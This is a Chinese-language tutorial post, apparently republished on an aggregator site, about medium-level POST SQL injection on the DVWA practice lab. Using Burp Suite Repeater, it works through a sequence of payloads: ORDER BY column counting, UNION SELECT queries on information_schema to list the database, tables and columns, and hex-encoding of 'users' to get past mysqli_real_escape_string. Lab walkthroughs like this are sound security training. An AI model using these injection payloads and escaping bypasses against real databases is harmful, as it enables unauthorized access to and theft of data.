POST注入借助Burpsuite工具

將DVWA Security調(diào)到Medium

1,查詢User ID為3，點擊Submit,先分析一下php源代碼

首先我們可知這是POST型，先檢查一下User Id 是否為空，如果為空執(zhí)行下列操作，先賦值id，然后轉(zhuǎn)義在 SQL 語句中使用的字符串中的特殊字符。之后在數(shù)據(jù)庫中查詢數(shù)據(jù)，將結(jié)果輸出給result，從結(jié)果集中取得一行關(guān)聯(lián)數(shù)組賦值到row，依次輸出first name,sunname。最后關(guān)閉函數(shù)。因為稍后再index.php?page使用，所以我們可以在此處進(jìn)行設(shè)置，以便我們可以像在其余源腳本中一樣在此處關(guān)閉數(shù)據(jù)庫連接

2.函數(shù)分析

(1)mysqli_fetch_row()：從結(jié)果集中取得一行，并作為枚舉數(shù)組返回。

(2)mysqli_real_escape_string()：轉(zhuǎn)義在 SQL 語句中使用的字符串中的特殊字符。

其余函數(shù)在初級文檔說明，在此篇不做重復(fù)闡述

3.進(jìn)行實際操作

在bp軟件中，當(dāng)USER ID=3時，出現(xiàn)如下界面，為了方便，我們把他轉(zhuǎn)到Repeater下，點擊Action，然后Send to Repeater

在箭頭指向部分將id=3改為id=3’，然后點擊Go

在id=3’時會出現(xiàn)如下錯誤，這是因為有轉(zhuǎn)義字符\，單引號失效，需要進(jìn)行繞過，后續(xù)會講怎樣繞過。

sql語句查詢列數(shù)，在箭頭那輸入id=3 order by 2后點擊Go,出現(xiàn)右面的結(jié)果

sql語句查詢位置輸入id=3 union select 1,2#

sql語句查詢數(shù)據(jù)庫名3 union select database(),2#

sql語句查詢數(shù)據(jù)表名3 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

查詢user表中列名

(對方使用轉(zhuǎn)義字符屏蔽’ , “等特殊字符，使用繞過方法，可以使用users對應(yīng)的ascii碼進(jìn)行繞過)id=3 union select group_concat(column_name),2 from information_schema.columns where table_name =’users’#

如何找users的ASCII,在Decoder中的Encode as 下找到ASCII hex就可出下面的

id=3 union select group_concat(column_name),2 from information_schema.columns where table_name =0x7573657273#

獲取數(shù)據(jù)

本文介紹的是中級SQL注入，將持續(xù)更新SQL注入高級以及盲注，歡迎大家點贊和收藏，您的支持是我創(chuàng)作的最大動力！

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯，堅持創(chuàng)作打卡瓜分現(xiàn)金大獎

總結(jié)

以上是生活随笔為你收集整理的sql 数组_sql注入中级的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。